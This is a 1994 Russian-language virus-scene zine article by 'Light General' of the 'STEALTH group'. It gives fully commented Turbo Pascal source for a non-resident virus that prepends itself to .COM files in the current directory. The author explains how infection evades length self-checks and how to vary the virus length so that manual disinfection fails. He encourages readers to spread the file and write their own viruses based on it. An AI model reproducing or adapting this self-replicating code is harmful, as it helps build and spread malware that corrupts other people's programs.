█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█  ▀					    ▀	       ███▀▀███
█ STEALTH group	█░ █ █▀▄ █▀▀ ▄▀▀ ▄▀▀ ▀█▀ ▄▀▀ █▀█    ▌ █ ▄▀█ █ ▄▀▀ ▄▀▀  ████▀▄██
█   presents	█░ █ █ █ █▀  █▀  █    █  █▀  █ █    █ █ █ █ █ █  ▀█▀▀  █████ ██
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█░ ▐ ▐ ▐ ▐   ▐▄▄ ▐▄▄  ▐  ▐▄▄ ▐▄▀     ▀█ ▀▄█ ▐ ▐▄▄ ▐▄▄  ███▄▄███
 ░░░░░░░░░░░░░░░░░                                                     DEC 1994
 			

(*########################################################################
   Приветствую всех почтенных программистов на языке Pascal 
   Вирусы это хорошая возбудилка для ума,но все думают,что написать вирус
   на 'высоком' языке весьма трудно.Так вот,знайте,что это НЕПРАВДА!
   Писать на Паскале весьма легко,правда величина результирующего кода
   вызывает благоговейный трепет в сердцах.:-)
   Но,что поделать,приходится этот самый код сжимать какой-либо Pklite
   и учитывать сие обстоятельство при повторной компиляции.
   Когда вы гляните вниз,то увидите откоментированный исходник
   нерезидентного вируса заражающего .COM файлы.
   Сам исходный текст был передан мне одним знакомым моего знакомого,
   а я уже дополнил и откомментировал его,чтобы все желающие могли
   написать что-либо интересненькое хотя бы по мотивам сего произведения.
-----------------------------------------------------------------------------
   В конец своего бредисловия выражаю великую благодарность тов. М-му
   за его (можно сказать невольный) полигон вирусов.
-----------------------------------------------------------------------------
#########################################################################*)


{$m 9000,0,250000}
uses dos;
label _1,_2;
const vir_len:word =4859;	  (* Длина запоколоченного вируса *)
const max_len:word =(65535-4859); (* Макс. длина заражаемого файла *)
var       f,f1      :file;
          p,p1,p2   :pointer;
          sr        :searchrec;
          l,l1      :word;
          b         :char;

begin
     assign(f,paramstr(0));   (* Берем имя файла откудова мы загрузились *)
     reset(f,1);	      (* Open this candy *)
     getmem(p,vir_len);
     blockread(f,p^,vir_len); (* Читаем начало сего файла (т.е. тело нашего
				 запоколоченого вируса *)
     seek(f,vir_len);
     l1:=filesize(f)-vir_len; (* l1:='незараженная' длина файла *)
     getmem(p1,l1);
     blockread(f,p1^,l1);     (* Читаем с того места где начинается сама
				 оригинальная программа (т.к. весь процесс
				 заражения состоит в отодвигании программы
				 в файле на vir_len байт и записи в это место
				 тела вируса.Т.е. теперь вирус будет иметь
				 управление первым.*)
     assign(f1,'Light.com');  (* Создадим на диске левый файл *)
     rewrite(f1,1);
     blockwrite(f1,p1^,l1);   (* Запишем в него только что считаную программу *)
     freemem(p1,l1);
     close(f);
     close(f1);
     if paramstr(1)='10' then (* Коли в командной строке была печетана цифра 10
				 то выведем информацию о вирусе *)
     begin
      writeln('VIRUS INFO.');
      writeln('Name : Big Body.');
      writeln('Model : C-',vir_len);
      writeln('Danger : 0');
      writeln('Stealth factor : -2');
      writeln('Language : Turbo Pascal 5.5');
      writeln('Creator & K : (c) Andrew .Modifity from Light General.');
      writeln;
     end;
     swapvectors;
     exec('Light.com',paramstr(1)); (* Запустим 'чистый' файл на выполнение *)
(* Теперь когда файл отработал - мы получаем управление!!! *)
     swapvectors;
     erase(f1);
     findfirst('*.com',archive,sr); (* Поищем чего бы заразить *)
_1:
     if (doserror = 0) and (sr.size<max_len) and (sr.name <>'COMMAND.COM') then
begin
     assign(f,sr.name); (* Откроем найденный файл *)
     reset(f,1);
     blockread(f,b,1);  (* Считаем первый байт *)
     if  b='M' then  goto _2; (* Если файл уже заражен то поищем другой *)
     seek(f,0);
     l:=filesize(f);
     getmem(p2,l);	(* Выделим память и считаем в нее найденый файл *)
     blockread(f,p2^,l);
     rewrite(f,1);
	(* А теперь перепишем энтот файл по новому *)
     blockwrite(f,p^,vir_len);  (* Сперва свое тело *)
     blockwrite(f,p2^,l);	(* А за ним оригинальную программу *)
_2:
     close(f);
      findnext(sr);	(* Будем искать пока файлы не закончатся *)
      goto _1;
     dispose(p);	(* Если файлы кончились то уберем за собой и выйдем *)
     dispose(p2);
     end
else
writeln('Мужики бросай работать - пошли пивасика пить!');
writeln('(И М********го с собой берите шоб он питание не вырубал.)');
end.

(*########################################################################
  Вы глянули эту писанину (может даже врубились чего и как),и хочу сказать
  я вам пару слов про особенности.
1.После заражения файл станет .EXE программой.
  Сие происходит оттого,что вирус после компиляции являлся .EXE файлом
  а при заражении просто прилепил к себе бедный зараженный .COM файл.
  Соответственно первые байты файла стали 'MZ',что говорит системе
  об экзешности файла.
2.Всякие программы реагирующие на изменение своей длины НЕ БУДУТ вопеть
  о гнусных изменениях файла т.к. он запускается вирусом в 'очищеной' форме.
3.Лечить зараженные программы можно тупо в текстовом редакторе --
  просто делая DEL для первых vir_len байтов.
  Но вирусатор может сделать vir_len:=vir_len+rnd(100),а оригинальную длину
  запоминать где-либо в теле вируса ;-).
4.И еще,запомните - программа зараженная ЭТИМ вирусом с защищенной от записи
  дискеты НИКОГДА не стартует!
########################################################################*)
(*
Я буду весьма рад,если после прочтения сих строк - этот файл станет доступным
для всех ваших друзей и знакомых.
На авторские права я не претендую - так,что делайте с этим вирусом чего хотите
но знайте,что вставляя в него строки могущие причинить вред чужой работе --
вы оскорбляете этого самого чужого человека.

	(w) Light General 08.10.94
*)